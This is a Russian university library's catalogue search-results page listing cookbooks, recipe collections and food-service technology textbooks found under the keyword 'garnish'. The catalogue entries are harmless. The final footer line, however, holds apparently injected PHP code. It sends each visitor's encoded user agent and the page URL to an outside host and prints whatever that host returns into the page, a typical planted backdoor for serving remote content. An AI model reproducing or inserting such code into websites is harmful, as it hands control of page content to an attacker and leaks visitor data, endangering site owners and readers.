Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

135 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ГАРНИР")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 23
1. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] / сост. Л. Е. Голунова, 2001. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
2. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
3. 
Калашников А. Ю. Кафе, бары и рестораны [Текст] : организация, практика и техника обслуживания / А. Ю. Калашников, 2008. - 379 с.
Держатели документа (Информация об экземплярах) 
4. 
Сборник рецептур блюд и кулинарных изделий кухонь народов России [Текст] : нормативный документ / сост. Л. Е. Голунова, 2003. - 391 с.
Ключевые слова 
КУХНЯ КАРЕЛЬСКАЯ -- КУХНЯ НАРОДОВ КОМИ -- КУХНЯ РУССКАЯ -- КУХНЯ БАШКИРСКАЯ -- КУХНЯ МАРИЙСКАЯ -- КУХНЯ МОРДОВСКАЯ -- КУХНЯ ТАТАРСКАЯ -- КУХНЯ УДМУРТСКАЯ -- КУХНЯ ЧУВАШСКАЯ -- КУХНЯ АДЫГЕЙСКАЯ -- КУХНЯ ДАГЕСТАНСКАЯ -- КУХНЯ ДОНСКАЯ -- КУХНЯ КАБАРДИНО-БАЛКАРСКАЯ -- КУХНЯ КОЛМЫЦКАЯ -- КУХНЯ КАРАЧАЕВО-ЧЕРКЕССКАЯ -- КУХНЯ КУБАНСКАЯ -- КУХНЯ СЕВЕРО-ОСЕТИНСКАЯ -- КУХНЯ ЧЕЧЕНСКАЯ -- КУХНЯ ИНГУШСКАЯ -- КУХНЯ БУРЯТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ НАРОДОВ СЕВЕРА -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- НАПИТОК ПРОХЛАДИТЕЛЬНЫЙ -- ИЗДЕЛИЯ МУЧНЫЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
5. 
Фатов М. Ф. 1000 блюд ресторанной кухни [Текст] / М. Ф. Фатов, В. В. Холодков ; ред. Н. И. Ковалев, 1985. - 295 с.
Держатели документа (Информация об экземплярах) 
6. 
Уоррен Дж. Шотландская кухня [Текст] / Дж. Уоррен ; авт. предисл. В. В. Похлёбкин, 1983. - 73 с.
Держатели документа (Информация об экземплярах) 
7. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

8. 
Технология производства продукции общественного питания [Текст] / В. С. Баранов, А. И. Мглинец, Л. М. Алешина, 1986. - 400 с.
Ключевые слова 
ТЕХНОЛОГИЯ общественного питания -- АССОРТИМЕНТ ПРОДУКЦИИ -- ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ПОЛУФАБРИКАТОВ -- ПОРЦИОНИРОВАНИЕ КУЛИНАРНОЙ ПРОДУКЦИИ -- КАЧЕСТВО КУЛИНАРНОЙ ПРОДУКЦИИ -- ПОЛУФАБРИКАТЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- СУПЫ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ВОДНОГО СЫРЬЯ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА БЫСТРОЗАМОРОЖЕННЫЕ -- БЛЮДА ОХЛАЖДЕННЫЕ -- ПРОИЗВОДСТВО МУЧНЫХ ИЗДЕЛИЙ -- БЛЮДА МУЧНЫЕ -- ГАРНИР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕЕ
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
10. 
Сборник рецептур блюд и кулинарных изделий из сои и соевых продуктов для предприятий общественного питания [Текст] : сб. технологических нормативов / под ред. М. П. Могильного, 2002. - 386 с.
Держатели документа (Информация об экземплярах) 
11. 
Кулинарные зарисовки о здоровом питании [Текст] : сборник / авт.-сост.: Г. В. Иванова, Л. Г. Макарова, И. Н. Пушмина и др., 2007. - 567 с.
Держатели документа (Информация об экземплярах) 
12. 
Технология приготовления пищи [Текст] : Учеб. пособие для студ. спец. "Технология продуктов общественного питания" / Омский ин-т предпринимательства и права, 2004. - 206 с.
Держатели документа (Информация об экземплярах) 
13. 
Калашников, Александр Юрьевич. Кафе, бары и рестораны [Текст] : производственно-практическое издание / А. Ю. Калашников, 2005. - 384 с.
14. 
Маслов, Леонид Александрович. Кулинария [Текст] : учеб. для ПТУ / Л. А. Маслов ; дар. В. Д. Полежаев, 1971. - 310, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Технология приготовления блюд и кулинарных изделий [Текст] : справ. пособие для общественного питания / сост. Р. П. Антонова, 2002. - 199 с.
Держатели документа (Информация об экземплярах) 
16. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2002. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
17. 
Калашников А. Ю. Кафе, бары и рестораны [Текст] : организация, практика и техника обслуживания / А. Ю. Калашников, 2006. - 379 с.
18. 
Сборник рецептур кулинарных изделий и блюд [Текст] : сборник, 2006. - 749 с.
Держатели документа (Информация об экземплярах) 
19. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2003. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
20. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Норматив. док. для предприятий обществ. питания / А. В. Румянцев, 1998. - 863 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.12 запросов, 0.49c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;